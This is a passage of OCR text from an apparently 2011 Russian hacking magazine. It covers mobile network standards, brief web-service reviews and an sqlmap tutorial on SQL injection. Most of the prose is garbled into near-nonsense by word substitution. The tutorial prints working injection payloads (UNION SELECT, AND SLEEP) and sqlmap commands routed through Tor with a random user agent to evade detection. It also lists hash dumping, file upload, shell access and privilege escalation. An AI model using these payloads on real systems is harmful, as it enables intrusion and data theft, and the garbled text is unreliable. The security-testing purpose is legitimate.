UMTS является

в мно гие моби л ь н ые кусок п ьютеры.

п опулярной техноло г ией

аналогом

Ста нда рт стал л да дером де-

мобильны х ЗG - сетей.

масштабах города

фа кто такой во передаче так точно н ных посредь

Су ществуют дополни-

Стандарт не без; п особен ваш брат -

пере н ос н ыми уст ройствами равным образом в целях

тельные надстройки надо

вваливаться на правах а л ьтернатива

вые песнь торы объединенно

самой

на ы аллюр во ан тер н ет. В результате

UMTS,

т рамы д осту п а на в отношении г ромном

л ичить резвость обмена

позволяю щ ие уве-

количест ве п окрывают районы

данными:

кру пн ых горо д насчёт во мира.

HSDPA.

HSPA, HSPA+,

Такие путы отно-

ся т для 0.5G- п околению.

WiMax

позволено перечислить

Wi- Fi,

хотя во

IWMANI .

Сети

LТЕ по полной обойме

разви-

л ась недавно, поз т ому

реализован на Христиания ! Ш ве-

н а заданный минута в отлучке

ция l . Круп н ейшие сото-

в один из дней на ернутых сетей.

DS L-соединению. Н а базе

со <<Скартел >>

из п ецификации реализуют-

ближай ш ем времени

IYotal во

ся системы, соединяющие

планируют составить в области

локальные сети, так

всей России козни LТЕ держи

получи ос н ове

замену н ыне существую-

Wi-Fi.

С п ецификация появи-

ваются . Успешный программа

суп м техноло г иям.

Мобильность

Н ет

Дальность

08-140

Частоты

0,4

Максимальная

Н ет

м

Г Гц

04 М би т/с

00- 050

м

0,4и5 Г Г ц

000 Мбит/с

Да

Нет !но существуют
мобильные спецификации!

Да

0км

0- 0 км

0- 000

0-11 ГГц

000-4000

05 Мбит/с

073 Мбит/с

0885-2025
0110-2200

М Гц

Н ет

км

00-100

м гц

"

км

.

04-862

-

М Гц

М Гц

0 Мбит/с

б

03 Мбит/с

s

""
~

бойкость

~

передачи данных

n>

М Гц

Ширина канала

00

Дуплекс

TDD

Доступ

CSMA!CA

00- 00

МГц

TDD
OFD MA

0 М Гц

0,25-20

FDD

FDD/TDD

W-CDMA

OFDMA

МГц

0,4- 00

МГц

FDD/ТD D

OFDMA/SC-FD MA

0-24

""s

М Гц

~

:0

~

TDD

~

OFDMA

Q

s

u

CL

MIMO

Да

Да

Нет

Да

Да

Да

Год выпуска

0003

0009

000 0

0004

0009

0011

БЫТЬ ИЛЬ НЕ БЫТЬ?
IEEE 002.22, п оя на ив ш ийся вместе с р авн равно тель н по отношению

""""

~

"
об

с:

изме н ений, а как и п ро ц едура со во мест н ого ис п касательно л ьзова н ия спектра

н е д ав н о, п ри н йес не без; внешне

вместе с лицензион н ыми п ользовате л ями. Как з н ать, на озмож н о, име н да э т что до

однако на ые живое золото н измы, ко т касательно р ые могу т п вал во что до л ить д онести качес тв е н ную

реше н ие поз на что касается л да т п окрыть необъят н ые п роста р ы нате ш ей ро д ан ы

от на яз ьд аже на самые по части тд а л ен н ые у г что касается л ки пл а н е т ы . Уникал ьн ый п что до д ­

качественным ан т ер н етом . Д аже кабы лагерь д арт н е п насчёт л учи т д олжной

хо д ко р е ш е н ию на относительно пр оса относительно д с грехом пополам н ии почасту т так г по отношению д иа п азона, ко т орый на

поддержки, в таком случае на любом случае от е г что до выхо д ом появи л ся новоизобретённый п од­

Р оссии стои т ос т ро, може т от д е л а т ь 002 .22 самым рас пр остра н енным

ход, когд а неодинаковые уст р ойства разных ста нд ар т что до на безвыгодный фи н ко ц ио н ирую т

от т а ндарт ом лукавый пр ово дн ой рычаги д ля п ок ры тия бол ьш их п ло щ а д ей.

обособ л ен н о, а взаимо д ейс тв ую т меж д у внешне равно оранье г анизо выв аю т

Дл моя особа э т об г что до пр име н яю т со моя персона р ассмотренн ы е на из т а т ье частное ска н ирова­

окружаю щ ее п ространство про вам г в отношении д так г что до совмест н ого испо л ьзова­

н ие р або ч е г в отношении д иа п азо н а, пос т оя н ный мо н равно т орин г да касательно т сминание

ния . И сие своего ро д а для ры в. :х:

026

ХА К ЕР

00 / 053/2011

ENCIPHER.IT

~

Н азвание зто го сервиса la скорее , инда доменного имени! говорит само вслед за себя: некто по­
зволяет запоминать сведения во любом сервисе: Gmail, Facebook равно любом другом. Как зто

работает ? На тротуар закладокдобавляется сепаратный букмарк, ко торый вызывает
простенькую функцию держи JavaScгipt, которая криптует выделенный подтекстовка не без; через AES 056.
Перед шифрованием у пользователя запрашивается шаг рольная фр я а , которая засим склифосовский
применяться дл моя персона рас ш ифровки . П олучается гениаль н насчёт удочка обная система, если бы н ужно
текст, получи п ример , во письме Gmail . П росто выбираем т ело сообщения, палка а­
ем возьми букмарк-и шрифт автоматично меняется бери зашифрован н ый. Если а тебе самому
пришла закриптованная священнодействие га, ведь заново но несложно вызываем букмарк, вводим шаг роль- да
получаемтекстеоткрытом виде .

Для шифрования сообщен ий на л юбы х серв да са х

BTDIGG
~
Есть изрядно сервисов-агрегаторов , которые индексируютторренты вместе с самых разны хт рекеров да

BTDIGGDHT

предоставляютудобный розыск по части ним . BTDiggтoжe позволяетнайти необходимый обложка во ВitТоггеnt­
сети, да использует на корне д ругой подходец . Это разведчик по мнению DНТ-сетиl Напомню, в чем дело? п ослед н яя
n озволяе т гвалт ганизовывать раз в год по обещанию д ачи во ВitТогегеnt-сети безтрекера вовсе. П об сут и, сие расnреде­

ленная сетьторрент-клиентов, которая хранити дентификаторы lхе ш иl всех публичных раздач
-т. н . mаgnеt-линков, представляющихсобой 060-битное случайное ч исло. BTDigg вседневно
индексируетDНТ-сеть да позволяетпроводить отыскание за м ета- информации, содержащейся на

любом торррент-файле . Можнодаже исnользовать ключевые словадля поиска : raname !поиск

по мнению имени файла!, racontent !поиск соответственно содержанию! .

>

...

-·- -----···
."______-

ideone.com

---....--.

------------

...-....- .-;

0 0!.-Оа .

- ------. · "J ,l

-.,.,......-

Для запуска заключение бери ра з ных аз многогрешный з ы для а х лично на браузере

IDEONE
jdeone corn

Разстолкнувшисьснеобходимостьюскомпилироватьвби н арникпростенькийкод,
мы н а д олго запом н шлам п роект ideone, кто ме н мы т по отношению гда выручил. П в рассуждении су ти, сие что касается н лайн­
килоом п илятор равно настройщик д ля сильнее нежели 00 языков n ро г раммирования . Д ру г ими словами,

_,_,__. . ..

- ·· - · --·-·

...,..... _
касательно -- что касается

_

·~·""·

x-.,..!OI!oo!

Поис ко торрентов поDНТ из ебать

не возбраняется написать адрес равно пустить его торчмя во браузере. Поддерживаются С/С++, Java, С#,
AssemЫeг, Objective С , по сию пору скри п товые языки lв томик числе Pythonl да даже если ассемблер . Важно
всего лишь вместиться на ограничения : 0О секунд получи и распишись компиляцию, 05 секу нд !если никак не зарегистри­
роваться, ведь всего 01 держи выполнение, 056 Мб nамяти . Помимо зто го , конспект никак не сможет
обраща т ься на Сеть равным образом мучиться не без; файлами . П роект предоставляеттакже API, которые боевито
ис п ользуютсейчас п ри л ожениядля р аза ны хмобильных nл а т форм .

(y~~~~mEP
Н аконе ц -то ваш покорнейший слуга н аше л ту систему дл ваш покорный слуга монитори н га хостов , которая меня п по отношению л ностью усик т раива­

ет. Я говорю об нечистая сила п латном сервисе tagBeep. Суть сервиса понятная - п роверять рабо т ос п о­

Uptime monitoring for smart people
Slmplto 00 uя and frН: fOf up to SO S4."Mrs.

собность веб-серверов равным образом уве д омлять об н аличии проблем . TagBeep п остроен nре д ельно про­

---__

_ _ tu: _
...,_
, _ _ __

сто, однако возле этом позволяетзадать тонкие норма пользу кого nроцедуры п роверки . Например,
позволительно подробно указать, экий именн в рассуждении отрицание в долгу пахнуть сервер, а какой- невыгодный приходится .

Или, ко nримеру, где раки зимуют време н утнапиштим граница сверху загрузку страни ц ы !скажем, 00 секунд!. TagBeep
умеетвизуа л изироватьвремяоткликаввидекрасивыхграфико~сохраняетскри нш оты

-

tagBeep .... - ·-· ......

·IIJ

.

---......

Stgn Up for f reel

_ _ us.o. _ _ _ _

"

...._

из во оих роботов lв кому всего только не лень моме н т мож н относительно посмот р ет ь , по образу выгл пишущий эти строки д ел сайт l . АSМS-опове щ е н ия,
та услу г а, после которую всегда кровь из носу берут денежки, в этом месте на срок бесплатна.
Суперпросто й равно удобны й мон равно торинг х коробка

ХАКЕР

00 /153/2 011

027

PCZONE

прославляющий мир Штамnар [miгoslav.stampar0gmai l .com l

S lmap, сиречь
S L:-инъекции
сие попросту
ОДНА ИЗ ЛУЧШИХ
УТИЛИТ ДЛЯ ПОИСКА
И ЭКСПЛУАТАЦИИ

SQL-УЯЗВИМОСТЕЙ

т ак, чт что до т акое

sq lmap? О д получай

изо мо щ ней ш их отк рыты хутилит

дл ваш покорный слуга п ентестера,котораяа на тамара т изируе тп ро ц есс п оискаи

экс пл уатации SQL- инъек ц ий со ц е л ью извлече н ия д анн ы х да ли
зах на а та фаллос а л е нн ого хоста. Ч в таком случае д елае т sqlmap хорошо ич н ым ото дру г их у т не в таком случае — не то т
дл ваш покорнейший слуга об н аруже н равным образом ваш покорнейший слуга SQ L-и нъ ек ц ий , т ак сие во озможнос ть экс п луатировать

каж д ую най мол нн ую уя з на имост ь . Это вал н а ч ает, ч т относительно sq lm ap способе н малограмотный
ведь ль ко н ахо д равно т ь « д ырку>>, да е щ е да заюза ть ее п насчёт п по отношению лн ой п ро г рамме. А
ко ль быстро во ка ч ест во е вслед за дачи со т а ви тс ваш покорнейший слуга име нн по отношению экс пл уа тация у язви мос ти ,

ведь ска н еру п р да хо д равно тс мы б ы ть особе нн что до на нима т ел ь ным для д ета л ям: спирт н е
буд е т ваша милость д авать м илл ио н лож ны х вместе с р абат ыв а н ий <<так, для на от ваш покорнейший слуга палка не без; л у ч ай>>

! во вкусе э т по отношению м ы на равным образом д им закачаешься м н насчёт г их др у г их пр равно л оже н иях]. Л юбая п насчёт те нци а ль ­
бери пишущий эти строки у мы з на имост ьд по части п что до лн равно т е льн в отношении п ро на ер автор этих строк е т от ян а на озмож только из т ьэксплуа­

Разработкой сканера занимаются неудовлетворительно человека. прославляющий мир Штамnар
(lilstampaгml, nрофессиональный создатель софта изо Хорватии , равным образом Бернар­

т а ции . Ска н е р равно з коробки да д ете в рассуждении гр ом ны м функ ц ио н алом, н ачи н ая касательно т

А• Дам•ле [lilinquisЬJ, консульт по мнению ИБ с Италии, без дальних разговоров nроживающий равным образом
впахивающий на Великобритании . nроект nоявился для планета на 0006 г. по причине
Данмзлю Беллучи [lilbelch), однако реально быстро стал развивать­

DB MS], соз д а н ия д ам п а

ся nосле того, во вкусе на 0009 г. на работу включил равным образом сь Миро вместе с лав равным образом Бернарда .

на озможности касательно п ре -де л ения систем ы упра вл е н равно ваш покорный слуга базой д а нны х !д алее
! ко п равным образом и] д анн ы х да зака нч чернотал моя особа п что касается л у ч е н ием до­

от ту п а ко от равно из т еме из во озмож н остью обра щ а ть из автор этих строк ко пр в рассуждении равно зволь ны м фай л ам
н а хае т е да вып по части лн ваш покорный слуга ть н а се р вере п роизво ль н ы е неподвижность нд ы. И во се-таки
гл а вн ое - э ведь об н а р сейчас н ие во озмож н ос т равным образом со д е л а т ь ан ъек ц ию SQ L- кo дa .

КАКИЕУЯЗВИМОСТИ
МОЖЕТНАХОДИТЬSQLМАР?
Е вместе с ть п автор этих строк ть осно вн ых для ла ссо на SQ L- равно н ъ ек ци й, равным образом всё-таки их п касательно дд е р ж равным образом вае т

sql map:
UNION querySQL injection. К л ассический

во ариа нт вн е др е ни моя персона

SQ L-кo д a, ко гд а на уязв да м ы й дружка м е т р п ере д ае т ся во ы р аже ни е,

н а ч равно н аю щ ееся от

«UNION ALL SECECT>>. Э т а т ехника

работает,

ко гд а веб - около л оже н да моя персона сверху пр ямую во вал на ра щ аю т р езул ьт а т выв что до д а

искажение нды

SELECT н а

не без; траниц у: не без; ис п касательно ль зо во анием ц ик л а fог равно ли п в отношении ­

хожим способом, эдак ч ведь каж д ая писание п по отношению л у ч е нн ой да з БД на ы ибо р для да
п ос л е д в рассуждении на а т е л ь н относительно вам кайфовый дит от мы в со т ра книзу у.

Sqlmap м ожет т акже экс­

пл уат равным образом роват ь ситу ацию , ко гд а во холм вр а щ ае т ся т по отношению л ько п ервая вслед за число «пи» не без; ь

изо ваша сестра ибо р для равным образом IP aгtial

UNION q u e г y SQL i пjectio п ].

Еггог-Ьаsеd SQL injection. В от л учае э т ой а т аки ска н ер заменяет
vlew plctures of the artlst

гиттия равно д об авл яе т во у автор з ви м ый п араме т р вместе с равным образом н т акс ич еск да н е пр а вильн ое

выр ажен да е, п ос л е ч е г насчёт п а р от ит НТТР- относительно тв е т ! из-за г относительно л по отношению вки да те л о] на п о­
comment on thls artlst

ис ке об ши бочок

DBM S,

на ко так р ы х со д ержа л маг и волшебник ь б ы ради р а н ее да з во ест н а автор

да нъ е цир в отношении ванн ая п ос л е д по части во а т е льн ос ть этим во об л об во равным образом гд е -т что касается « р моя персона д об м >>

Links
Securily art

Fractal Explorer
About Us Privacy Pollcy Contact Us

выв об д держи инт ересую щ ий н воздушный ас п по части д вслед пр ос. Э т а т ех ни ка р або т ае тт по отношению ль­

ко т относительно гд а, ко гд а на еб -пр да л оже н ие п относительно каким-т что до прич равно н ам !ч а щ е до сей времени г что касается
на ц е ля х отлад ко и] р аск р ы ва е т в рассуждении ши бк равно DBM S.
Stacked queгiesSQLinjection. С ка н е р пр оверяет,

п одде ржи на ает л да

во еб -пр равным образом л оже н ие п ос л е поперед вате льны е вслед п рос ы , равным образом , кабы что до н равно на ып что до л няю т­

UNION querySQL injection

028

от мы , доба вля ет во уяз вимы й п а р аме тр НТТ Р - вслед пр оса т что до ч ломоть ради п мы праздник

ХАКЕР

l;l равно

00/153/2011

Sqlmap, иначе SQL-инъекции-это прямо-таки

,·itJcpiщisЯr.
co.tuЬit а.tщ_ тэut ii: .ad.:ntы

""

f6W""f""c FriQsiJb Uipk-tt,

Sй3il:6 dr:!auttl

n»pt p:tl~cc.t etum Ьс~. Ш ~ut Ri!l \ CI ~di"odto, JpJaНt~ ,.j!p~S~:iltf..
E~r сrм m.J~"-91:4 pМtUo:nr pЬJвcllus юdctiJqucdii:. ,~SfiЬuluш tf 01~ urм
~iiOI CU, ...-cl Э~:ckf~ Rm:l o.Y$:~1tlct quit ltllМif. ullиm: Otp:f rcd: IIUII II ~Q
0,:\bJIC id,ttbl rwUa.g;puws ut"Dj, pelkftr~ rM inrlsuf... \il~vcl o.-c(l(li.э. Doo:c
\"<!fiЬuluru. cp.."iUCS "-."4101 ffl\5 ~О liЬcro (,.":f"m:tiNIJI, tftiф"f S~XiiJ. \ ilt.: спв ~
ff ~ilb . Eiil Ut.16.we so..--losqu. ur рпсэ:яr ~ lc:tiUS lac•t..

lf

~--

••

ln -.:1soda~s utoШt. Mt fl4)xt~ qui s.чuc п StXiesqu fial(, ooel шd.».v jtf:lt*ltt я~
dutJpritni~pe.n.-.,,~

sia. к:mщuе

N~uc»:d ~t JN

IJ"$8C:UIIc"" "" esa
COIIU Ь1111 i& Wtll а М!: М 0МiЮ d~щ. Du

СUм:б. \\"l~f Ш~ ~8.. j lll(:( .аб] <1!~
lfPb ducitrwd:~ .мr:~cr~~~ vcJA (""ibus 01011, vlvc:m lu ~ rьксо con ~a116.
rttJIII \-iVC:Ш, pt:l).•111~ litl $\."tll tli:Wtia. \"~С ~f~COttVIJ i б, "\"f\~fttuf. ctOI IUtpti
ckt1 Ni* lro

J

Jolhcr

!fв•-Ьfis""

J"IW""irrlf. <n.todJ;) L~~ra J. d~ mша.~ p.:.miiOf crJr, CJ t~rifus ..,."...., U\1
\"~ca."imistil. \o"CI"J:"ItМIJI:OitlltV>do likp)ltlhll", "o"iltc ltllttdUШf~ \"CblWb 0111
«ttubltt~mюtS iDdJ:euшniЫ. dui , м, ,-;uс Fr~IЬ J.llll~ . ~iliid:stnнll
•trr.IS!JIA p;llctA:J.qUC Cl ctlltn b c.!JI, ifl М1Jftt lti!-f VC.I ~ (kl).y odfo. iрющ tldr6r:"i11~,

Ep:r C("fl( nu~ta. t:d p~W~:IUfa."fll pltf«tlus ю:lcПS4jucd6;\"(flibuluшlf ii1t~ urm
pccttit« cu, vcl s-;cL"f •
ма.-t ("(WWS(Wrucr quiJ.. tt~s Шlam:orp:t. rc:dr: ttutla qiOJ
d:t)."f.: d , IИ!tooUA.\ApwttSun».pc(l."fil~ f ~ ioriSUJ.. \11111:Vtl o:eod.;, I>I.""ICC
\"<"ЯiЬutшiL •яю: tJI"Wf C"f\~ i." " lif>eN (мn.-newш. ilil~ :ю:iis ooir~~~: с:rм I"U"):
& ~ftЬ .

Elir scd~.Ю.:iO !-qU, Ul rrJC!J\"111 ~ lo:W• l ~iiUI.

:1 0=

lh .m:t s.dtks.JOOIIiJ.. Jil wpitfl quisqutU!ЮeiOSoqV IIIYI:. \Cio:cd:ilY pi"CSiffll rtiJI:5I:."13
ckttirciflliJ.. pcl}."tt~ Jil, S«nOCq.:tt . NC"qUc~d ~. ~ piWnШIIciMsi:cя

~=-

0

0

Jn мn:t todi):swoUit. si1W{li.--.. ~i~qwcac~u ld:", vcl l"ll:tOO.kwpn(::Sillffif ""~

c uмg. "\"Q~S. nldQS<pi:;. а111~ t.1i$l ~ct (ionubla ii~ta**..:a ~di.J11L Dui
lipb duc.ilшs ~~tl" li ~ vct"l ftto:ib11S0 011, \ ivcш lucw l"h ~R~n coavaJI.is.
trJitl \lvem. pclkot~ vcl SCIIt cl« w.ta. ""~t IМ:f(ЬQco u~ aJJIS. \ "f""lfiWS- cros hlrp15

<kiJS:prittlif.. peJ.k111 CiQ"Itffi,U:o"tЬ."qUC, N~UC~~.so.1~CfJfiCtk6 J«t
CIIМIS. \\)q:t"-Js t•as ~в. anteeл6J "~~ Coflubla in \11\а aco:JCL М»d~ 011. Dui
l~ b ducM" io\:~ct lt •••c iA ftp;iЬtJs noa, vivcm lu~ Phan:ucottvt11118..
mш ~ivem. pclkllltsqQ:" vcl $1Ntl eiA \l"lta. \ " r.)t tй..-IO!wn coцvtlllls. ""f"~lltUJ ctOJ. tufpii

ati

~~ N ~ I ю

t: ~W~t: IQ)

Boolean-based Ыind SQL injection

затем внедряемый SQL-зaпpoc. Этот близ ем во основном используется

внедренным кодом. Здес ь вдобавок используется а лгоритм двоичного

чтобы вн едрения SQ L-к оманд, отличных oтSELECT, напримердля мани­

поиска. Кроме того, nрименяетс мы особый методдля вери­

пуляцииданными [с через INSERT или — или OELETEI . Примечательно,

фикации данных, воеже добавить объективная возможность далеко не правиль хотя го

чтоте х ника потенциально можетпривести для внутренние резервы чтения/

извлечения символа ради нестабильного соединения.

дневной журнал изо файловой системы, а в свою очередь выполнению оболочка нд во ОС .
Правда , взависимостиоти вместе с пользуемойвкачествебэк-эндаси стемы

Несмотрянаточтосканерумеетавтоматическиэксплуатировать

управления базами данны х, а тоже пользовательски х привилегий.

найденные уязвимости, нужно по ниточке представпять себя каждую

Boolean-based Ыind SQL injection. Реализация таково называемой

изо используемы х техник. Если содержание SQL-инъекций тебе непостоянно знакома

безотчетный инъекции: материал изо БД на «ч истом » виде уязвимым веб­

только лишь сверху пальца х, рекомендую полистать ар х ив][ либо — либо прочит а ть ма­

приложени ем нигде безграмотный умереть и никак не встать з вращаются. Прием та кже называется

нуал Дмитрия Евтеева <<S QL lnjection: От А прежде Я >> I ЬJt . lvlpBSNVA J. Важно

дедуктивным. Sq lmард обавляетвуязвимый парам етр НТТР ­

в свой черед лошадь мать, что-нибудь чтобы разны х OBMS реализации атаки почасту

запроса синтаксически верно составленное выражение,

крепко отличаются. Все сии случаи умеет приготовлять sqlmap равно получи и распишись

содержащее подзапрос SELECT !или любую другую команду на

определённый миг поддерживает MyS QL, Oracle, PostgreSQL, Microsoft

п олучения выписка изо базы данны х !. Для каждого полученн по отношению го

SQ L Server, MicrosoftAccess, SQLite, Fir eЬiгd, Syba se да SAP МахОВ .

НТТР-ответа выполня етс автор этих строк сравне н ие headers/body страницы

ФИШКИ

от ответом возьми исконный запрос-таким образом, обслуживающая программа

SQLMAP

можетсимволзасимволомопределитьвыводвнедренного

Дви жокдля определения SQ L- уязвимостей - пес не без; ним да самая важная ,

SQL- выражения. В качестве альте рнативы ламер может

же как-никак отнюдь не единственная порция функцианала sqlmap. И раньше нежели

вверить строку тож регулярное вид к определения

согласно показывать работ у ска нера на действии, далеко не могу хоть бы бы вкратце, а отнюдь не

« tгuе >>-с траниц !отсюда равно слово атаки!. Алгоритм би нарного

загнать касательно некоторых его фишках. Итак, на sqlmap реализовано:

пои ска , реализованный на

sqlmap к выполнения этой техники,

Извлечение имен пользователей , хеш ей их танцевальный шаг ролей , а равным образом при­

станет равным образом звлечь с головы мандала вывода предел взяв семь раз НТТР­

вилегий равно полей.

запросами. В книга случае, когда-когда выведение помогите т ои т малограмотный лишь изо обычных

Автоматическое признание подобно ис п ол ь зуемо го хеш а да воз­

символов, сканнер п одстраивает алгорифм ради работы вместе с побольше

можность взлома его не без; через брутфорса п насчёт словарю .

широким диапазоном символов !например ради uпicode "al.

Получение списка баз данны х, таблиц равным образом со толбцов.

Time-based Ыind SQL injection . Полностью слепая инъекция. Точно

Во змож ность содеять точный сиречь отдельный дамп базы данных.

что-то около а во вкусе равным образом во предыдущем случае, автосканер << играет >> из уязвимым

Продвинутый приспособление поиска баз, таблиц не так — не то даже если дерево цов !по

парам етром . Но на этом случае добавляет подзапрос , какой-никакой при­

на сем базам сразу!, что такое? может существовать благодатно к определения та­

водит ко пау зе работы

OBMS получи определенное наличность секунд
!например, из п омо щь ю командSLЕЕР(J или — или BENCHMARKIII. Исполь­

блиц из <<интересными>> данными слыхать имен пользователей luseгsl

зуя эту особенность, автосканер может посимвольно извлечьданные с

Загрузка тож , наоборот, закачка произвольны х файлов для сервер,

БД, сравнивая срок ответа для беспримерный вопрос равным образом получи вопрос из

yes ли уязвимое веб-приложение использует MySQL,

другими словами муть алей lpassl.

Po s tгeSQL или — или

MySQL,

Microsoft SQL Server.

Выполнение произвольных команд равным образом приём шелла, когда возьми хаете
да вместе с пользуется одна изо СУБД , перечисленных на предыдущем пункте.

Поддержка прям насчёт г по части подключения ко базе данных ! минуя явного ис­

SQL-ИНЪЕКЦИЯ: ЧТО ЭТО?

пользования SQ L- уязвимостиl со использованием полученных на
хо -де атаки имени равным образом шаг рулон моя особа пользователя с целью перед вместе с тупа ко ОМ BS, а
опять же IР- адреса, п оранье т а да имени базы данных .

SQ L- инъекция- сие атака, направленная получи веб-приложение, на
хо дескать которой конструируется SQ L-выражение с пользовательского

ввода п у тем азбучная истина конкантенации !например, $query; " SELECT

*

Установка надежного ТСР- сое динения !так называемого out-of-

bandl в обществе машин ой пентестера равно хос том, держи котором запущен
се рвер баз данных. В качестве обертки для того сего канала может

FROM users WHERE id;" .$_REQUEST[ "id" ]l . В случае успеха атакующий

от похитчик интерактивная командная ряд lшеллl , сес эта Меtегргеtег

может изменитьлогику выполнения SQL-зaпpoca так, что сие ему

не в таком случае — не то посещение ко удаленному рабочему столу сквозь VNС-подключение .

нужно . Чаще всего делов возлюбленный выполняет бездействие fingerprinting СУБД, а тоже

Повышение привилегий дляпроцессабазы данных сквозь команду

извлекаеттаблицы из больше всего <<интерес ными >> именами !например

getsystem Metasploit"a, которая, не беря в расчет прочих , реализуетизвест­
нуютехнику kitrapOd IMS1 0-0151.

<< users >> l. После этого, на зависимости с nривилегий , от которыми за­
nущено уязвимое приложение, возлюбленный можетобратиться ко защищенным

частям бек - э нд а веб- прил ожения !например, прочитатьфайлы сверху

Как сам с авторов этой утилиты могу ск азать: сие в сущности

не без; тороне хос таиливыполнитьпроизвольныекомандыl.

благодушный ан ст р у мент, соз отваленный х акерами на хак еров . И дьявол работает!

ХАКЕР

00 / 053/2 011

029

PCZONE
ПРИСТУПАЕМ К ПРАКТИКЕ
Убедиться во э книга тебе помогут невыгодный ско лько мои х сценариев. Это наибо­
л ее типичныеситу а ции ,кото рыеи из польз ую ведь из н в рассуждении вны евозмож ности

ТИПИЧНАЯ ОШИБКА

sqlmap . К вместе с л что до во у, твоя милость т оже можешь вместе с ра зу пров ери ть поголовно функционал
сканера- наприм е р, для предумышленно созданном тренировочном при­

ложении с OWASP l www. owasp . oгg l . во котором предумышленно воссозданы

Той ошибкой пр ог раммистов, ради которой из тановится в зм ожной

многие изо опасных ошибок прогр аммис тов . Тут нужно сказат ь , в чем дело?

SQL-aтaкa, чаще во се г по отношению является пр овраг аз многогрешный конкантенация нефилыруе­

sqlmap написан бери Pythoп" e, а значит, твоя милость сможе шь ради п побег ти ть е го подо

мых иначе неприводимых для нужномутипу значений сила аме тр ов во из тро­

кому лишь только не лень ОС . Единств е нноетребовани е - сие хайло новленный на вместе с истеме

ках, которые со д е р жа тSQL-выра а ния. Например , во РНР н а иболее

интерпр ет атор пайтона. В качестве объекта к теста получи проникно­

частым примерам небрежности является контрафакция стих врод е

вени е моя особа буду пускать в ход вирт уа льн ую машин у, получи и распишись которой короче

$query="SELECТ

кр у тить ся из тандартный со тек LAMP [Liпu x/Apa che/ MySQL/PHPI сообща

name, description, comment FROM catalogs WHERE
catid=" .$_GET( "catid" ]. Как твоя милость гляди , GET параметр "ca tid " напря­

от н еско лькими уяз вимыми ве б- приложениями.

мую извлекается равно з зап ро вместе с а равным образом вслед за пр ос в таком случае может со д е грохотать з л по отношению сокрушительный

СЦЕНАРИЙ N21
Условимся, ч так я хотим пр оэкс плуатиров а ть уяз вимо сть , котофей орая была

SQ L представление . Таким образом, взломщник может пр осто прив ести URL
ко лицо у слыхать «http: //www.site.com / vuln. php?page=front&catid=-1
UNION ALL SELECТ database(), current_user(), version()&uid=e », к

найдена на GЕТ-параметре «id >> веб-страницы, расположенной в соответствии с адресу

тог по отношению в надежде нажить информацию по части базе д анных, ко торая отобразится

http: //www.site.com/vuln.php?id=1lдля указания URL довольно контролька -ul.

прямов со держимомстраницы .

Чтобы со ни з ить подозрительн ую активность, автор будем ма ски р что касается ваться п по части д

обыч ный браузер [ клю ч --гandom-ageпtl, а интересах подключ е ния использо­
во а тьза щишки щ ен ный арык ТОR- узы 0 -- toгl. Итак, вслед за пускаем sqlmap:

INFORMAТION_SCHEMA . CHARACТER

$~python

_I}"Jte: UNION.._guery
Title : MySQL UNION query {NULL) - 0 columns
Payload : id=1 UNION All SELECT NULL, NULL, CONCAT{CHAR{ 08, 08, 016
, 02е, 08), IFNULL{CAST{CHAR{74, 06, 03, 012, 011, 013 , 0е3, 018 , 0е , 04) AS СН
AR), CHAR{ 02}} ,CHAR{ 08, 08, 021, 0е2, 08))

sqlmap_,py -u "http: //www.site .comLvuln.php?id-=l::_
- -random-agent --tor
sqlmap/1.e-dev {r4365} - automatic SQL injection
апd database takeover tool

SETS GROUP

ВУ

x).Q)

Сканеропределитнесколькоточекдлявыполненияинъекцийв

07 HTTPISJ- зa пp ocax. Обрати

внимание, чтодля каж д ой с нихуказы­

вает ся т ип , а такж е пэйлоад.

_Iy_pe: ANDLOR time - based Ыind
Title : MySQL2_S.e .11 AND time-based b_lind
Payload : id=1 AND SLEEP{1e)

Place : GЕТ
Parameter: id
_Iype: bQolean-based Ьliпd _
Title: ~NQ.Qp_Qle_a n : bas~_Q.Jind- WHERE QC.!:JI\.VIN.§__ ;;l_~,ц~----­
Payload : id=1 AND 0826=1826

но др угих тех нологий , да спо льз в отношении ванны хвеб- прил оже ни ем:

Туре : error-based
Title : MySQL >=5.е AND error-based - WHERE or HAVING clause
~yload: id=1 AНJL{SELECT 0232 FROM(SELECT COUNT(~},CON(.AT{
CHAR( 08 , 08 ,11Q"l.Ш,58 }.,_{SE LECT (CASE WHEN (8532=8532) THEN 0
ELSE е END}},_CHI\R{ 08 , 08 ,121 , 0e2 ,~8 }.,FLOQI!(RAND(ill * 0 ))x FROM

Помимо эт ого , ска н ер выполнит ра спознава ни е базы данных, а так­

(е2 : е1 :45] (INE.Q]_the back-end DBMS is MySQL _ _
web application technology : РНР 0.2.6, Apa che 0.2 .9
back-end DBMS : MySQL 0.е

В конце концов п касательно л у ченны е материал будут ради писаны во определен­
ный файл:
(е2 : е1 :4 0] [INFO] Fetched data logged to text files under "/ opt/
sqlmap/output /www .site .com"

~ The page cannot Ье dis... х

е

iQ}

СЦЕНАРИЙ N2 0
Теп е рь сле дую суп й присутствие мер. Предп по отношению л ожим, зачем ты да я хотим устро ить

сильнее д е тальный fiпgeгpгiпtiпg 0-fl да полу ч итьт екс товый баннер

The page cannot

Ье

0--Ьаппегl сис т е наша сестра у правления базой данны х, включительно ее офи ци­

displayed

альное название, н омер версии, а опять же т еку щ его поль зователя
Th~e
Ье

is

а proЬiem

with the p;sge you are trying to

recкh

and it cannot

dlsplayed.

роли 0--pas sw oгds l вме от те не без; именами таблиц 0 -- taЫesi , только малограмотный начиная
системные,[--ехсlu d е-sуs dЬsl-для всех со д ержа суп хся во СУБД баз

Please try the following :

0--cuггeпt-useгl. Кроме того, нас будут увлекать сохраненные движение ­

д анных . Н ет пр об л ем , ради п ускаем скане р :

Olck the EШ.t1!l button, or try ~ain later.

• Open the 072 .16. 062. \32 home page, and then look for links tt
the informatfon you want.

$ python sq l i!!_ap.py -u "l:!.:t1p: //www.site.com /v ul.o_.php ?id=1"
--random -agent - -tor -f --banner --current- user --passwords
--taЫes --exclude -sysdbs

НПР

000. 000 - Internal Server Error - ASP error
Internet lnforrмtion SeMces
Techn ical Information (for support personnel)

Оч е нь бойко наш брат паркет у чим на се факты об да вместе с польз уем ы х т ехно логия х,
OLE DB Provider for
[Microsolt)[ODВC

falled

wh~n

ООВС

Drivers

(О х80040Е07)

SQL Server Drlver)[SQL Server)Conversion

converting the nvarchar value ":Microsoft SQL Server

0005- 0.00.1399.06 (lntel Х8б) OCt 04 0005 00 :33 :37
Copyrlght (с) 0988-2005 Microsoft Corporotion Express Editlon
on Windows NT S. l

0

Error-based SOL injection

030

которые следовать прашивали:

(Вuild

0600 : Service Pack 0) :" to data type

(е2:е8:27]

(INFO] fetchiпg baпner
